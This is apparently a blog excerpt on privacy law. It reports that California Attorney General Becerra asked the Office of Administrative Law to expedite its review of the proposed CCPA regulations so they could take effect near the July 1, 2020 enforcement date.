An important note is that the AG has requested an expedited timeline for OAL review in order to make the July 1 date for enforcement applicable.  Specifically, Attorney General Becerra points to his particularly early submission of his rulemaking package in advance of his October deadline. This is in support of his request for the OAL to expedite their review consistent with the standard 30 business day requirement, which would bring the Regulations’ effective date close to in line with the CCPA’s specified July 1, 2020 enforcement date. Continue Reading California Attorney General Becerra Publishes Final Text of Proposed CCPA Regulations